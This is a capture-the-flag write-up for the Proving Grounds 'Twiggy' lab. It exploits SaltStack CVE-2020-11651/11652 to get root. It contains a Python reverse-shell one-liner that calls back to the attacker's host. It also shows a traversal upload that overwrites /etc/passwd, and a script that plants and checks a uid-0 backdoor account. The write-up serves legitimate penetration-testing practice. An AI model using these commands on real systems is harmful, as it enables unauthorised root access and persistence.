Twiggy

Writeup for Twiggy from Offensive Security Proving Grounds (PG)


Last updated 3 years ago


Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.134.62 -t full

nmapAutomator.sh -H 192.168.134.62 -t vulns

Port 80

Mezzanine, a Django-based CMS, is running on port 80. The foothold below comes from the Salt service, not from Mezzanine.

Port 8000

The SaltStack Salt REST API (salt-api) is running on port 8000, which tells us a Salt master lives on this host. Note that the exploit used below does not go through this REST API: it speaks Salt's own ZeroMQ request protocol directly to the master (the PoC's --master option, port 4506 by default), so that port must also be reachable from our machine.

Exploitation

SaltStack versions before 3000.2 and before 2019.2.4 (which covers every 2017.* and 2018.* release) are affected by CVE-2020-11651, an authentication bypass in the master's ClearFuncs that gives unauthenticated remote code execution, and CVE-2020-11652, a directory traversal in the wheel module that gives arbitrary file read and write as the user the master runs as, normally root.

We can try to execute a reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

However, this does not work (presumably because outbound connections from the target are filtered), so we fall back on the file read/write primitives the same bug exposes.

We can, however, read arbitrary files, including /etc/passwd and /etc/shadow: the traversal is resolved by the salt-master process itself, which runs as root, so file permissions on the target do not stop us.

We can also write arbitrary files the same way. To add our own uid-0 user, first download the target's /etc/passwd to a local file named passwd, then append a new entry (note the uid and gid of 0):

echo "root2:bWBoOyE1sFaiQ:0:0:root:/root:/bin/bash" >> passwd

Note that this hash corresponds to our custom password, mypass. Placing a hash in the second field instead of x means the login stack authenticates against it directly and never consults /etc/shadow for this account, which is why the shadow file does not need to be touched. A bare openssl passwd produces a traditional DES crypt hash with a random two-character salt, so your output will differ from the one shown; openssl passwd -6 gives a SHA-512 crypt hash instead if the target's libc refuses DES hashes.

$ openssl passwd mypass                                                    
bWBoOyE1sFaiQ

Upload the modified file over the original: python3 48421.py --master 192.168.134.62 --upload-src passwd --upload-dest ../../../../../etc/passwd. The destination is resolved relative to the master's file roots, and the ../ sequence walks out of it to /etc/passwd (this is CVE-2020-11652). Get this step right on the first try: a truncated or malformed /etc/passwd can lock every account out of the box, including ours.

Check that our user was correctly added by reading /etc/passwd back from the target and confirming the root2 line is present and intact.

Now, using the root2:mypass credentials, we can SSH into the server and land in a root shell, since the account has uid 0. This works because password authentication is enabled in sshd; keep in mind that sshd applies PermitRootLogin by uid, so a uid-0 account like root2 is only let in when that setting allows root password logins, as it does here.
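The append-then-verify part of this procedure is worth scripting, because a malformed /etc/passwd is a self-inflicted denial of service. The following is an added example written for this writeup, not code from the original page or from the 48421 exploit: it validates the fetched passwd copy, appends a uid-0 entry carrying a crypt(3) hash, and re-checks the file read back after upload. The sample passwd content is constructed; the hash is the one from the writeup.

```python
"""Prepare and verify a uid-0 backdoor entry for /etc/passwd.

Added example: the target's /etc/passwd is fetched with the arbitrary-read
primitive, appended to locally, then pushed back with the arbitrary-write
primitive. A malformed /etc/passwd can lock everyone out of the box, so the
edit is validated before upload and re-validated on the copy read back.
"""
import re

# Constructed sample standing in for the file fetched from the target.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "salt:x:999:999::/home/salt:/bin/false\n"
)

# Traditional DES crypt(3) as produced by a bare `openssl passwd`:
# 2-char salt + 11-char hash, alphabet [./0-9A-Za-z].
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
# Modular crypt hashes: $1$ (MD5), $5$ (SHA-256), $6$ (SHA-512), $y$ (yescrypt).
MODULAR_CRYPT_RE = re.compile(r"^\$(?:1|5|6|y)\$[^:\n]+$")


def parse_passwd(passwd_text):
    """Split passwd text into records; raise ValueError on a malformed line."""
    records = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line:
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        if not name or not uid.isdigit() or not gid.isdigit():
            raise ValueError(f"line {lineno}: bad name/uid/gid in {line!r}")
        records.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return records


def add_root_user(passwd_text, username, pw_hash, shell="/bin/bash"):
    """Return passwd_text with a new uid-0/gid-0 user appended.

    The hash goes straight into field 2; because it is not "x", the system
    authenticates against it directly and never consults /etc/shadow for
    this account.
    """
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", username):
        raise ValueError(f"unsafe username {username!r}")
    if not (DES_CRYPT_RE.match(pw_hash) or MODULAR_CRYPT_RE.match(pw_hash)):
        raise ValueError(f"{pw_hash!r} does not look like a crypt(3) hash")
    existing = {r["name"] for r in parse_passwd(passwd_text)}  # also validates input
    if username in existing:
        raise ValueError(f"user {username!r} already exists")
    if passwd_text and not passwd_text.endswith("\n"):
        passwd_text += "\n"
    return f"{passwd_text}{username}:{pw_hash}:0:0:root:/root:{shell}\n"


def check_backdoor(passwd_text, username):
    """Confirm the backdoor landed in the file read back from the target.

    Returns the record if the user exists with uid 0 and a usable local
    hash (not "x", "*", "!" or empty), otherwise None.
    """
    for r in parse_passwd(passwd_text):
        if r["name"] == username and r["uid"] == 0 and r["pw"] not in ("x", "*", "!", ""):
            return r
    return None


if __name__ == "__main__":
    # Hash from the writeup: `openssl passwd mypass` -> bWBoOyE1sFaiQ
    modified = add_root_user(SAMPLE_PASSWD, "root2", "bWBoOyE1sFaiQ")
    print(modified, end="")
    print("backdoor ok" if check_backdoor(modified, "root2") else "backdoor missing")
```

Workflow: fetch /etc/passwd, run add_root_user on it and write the result to the local passwd file, upload as shown above, fetch /etc/passwd again and run check_backdoor on that copy before trying SSH. To confirm a DES hash matches the password you think it does, re-derive it with the same salt (the first two characters): openssl passwd -salt bW mypass must print bWBoOyE1sFaiQ.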

Exploit from:

https://www.exploit-db.com/exploits/48421